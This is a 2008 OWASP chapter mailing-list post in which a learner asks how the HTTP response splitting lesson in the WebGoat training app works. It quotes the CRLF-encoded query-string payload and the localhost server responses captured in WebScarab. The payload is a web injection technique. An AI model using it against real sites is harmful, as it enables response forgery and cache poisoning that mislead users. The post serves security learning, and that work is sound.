[Owasp-cincinnati] WebGoat HTTP Splitting Attack Question

Zhou, Yan yzhou at medplus.com
Fri Jul 18 09:46:52 EDT 2008


HI there, 

 

Although I successfully completed HTTP Splitting Attack in WebGoat 5.2,
I did not understand a step-by-step behavior of the attack.  I am using
WebScarab to capture all request & response to give me a better idea. 

For example, what does the browser do with the 2nd "made-up" response?
Here is what I did for testing. 

 

First, I put in the query parameter exactly as is given in the hint:

language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK
%0d%0aContent- .........

 

This is the response I got from server below:

 

HTTP/1.1 302 Moved Temporarily

Server: Apache-Coyote/1.1

Location:
http://localhost/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&langu
age=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%
20OK%0d%0aLast-Modified:%20Wed,%2016%20Jul%202018%2012:55:46%20GMT%0d%0a
Content-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Ins
ert undesireable content here</html>

Content-Type: text/html;charset=ISO-8859-1

Content-length: 0

Date: Wed, 16 Jul 2008 13:47:47 GMT

 

Notice that the response does not appear to be split, the 2nd injected
response is still part of the query parameter as shown in "location"
header. Is this a display issue or am I missing something?

 

The browser then generates the next GET request, everything I injected
is now part of GET parameter (if the response is split, I would not see
the injected content being part of the query parameter, right?)

 

GET
http://localhost:80/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&la
nguage=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%202
00%2
<http://localhost/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&lang
uage=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200
%252> ...........

 

Then, the response from server, the server should respond with the above
GET request, right? But here is what I see, notice that is DIFFERENT
from what I injected because of the additional headers. 

 

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Pragma: No-cache

Cache-Control: no-cache

Expires: Wed, 31 Dec 1969 19:00:00 EST

Content-Type: text/html

X-Transfer-Encoding: chunked

Date: Fri, 18 Jul 2008 13:28:52 GMT

Content-length: 45

 

<html>Insert undesireable content here</html>

 

My questions are:

1. I would hope to see two responses being split in the middle like
this. I do not know if this is just a matter of displaying (since the
attack was successful)

 

        HTTP/1.1 200 OK
        ...
        Set-Cookie: author=Wiley Hacker
        
        HTTP/1.1 200 OK
        ...

 

2. why is not there a response to the 2nd GET request, but a similar
response to my injected text?

 

Thanks, 

Yan Zhou

 











Confidentiality Notice: The information contained in this electronic transmission is confidential and may be legally privileged. It is intended only for the addressee(s) named above. If you are not an intended recipient, be aware that any disclosure, copying, distribution or use of the information contained in this transmission is prohibited and may be unlawful. If you have received this transmission in error, please notify us by telephone (513) 229-5500 or by email (postmaster at MedPlus.com). After replying, please erase it from your computer system.



-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-cincinnati/attachments/20080718/b56809cb/attachment.html 


More information about the Owasp-cincinnati mailing list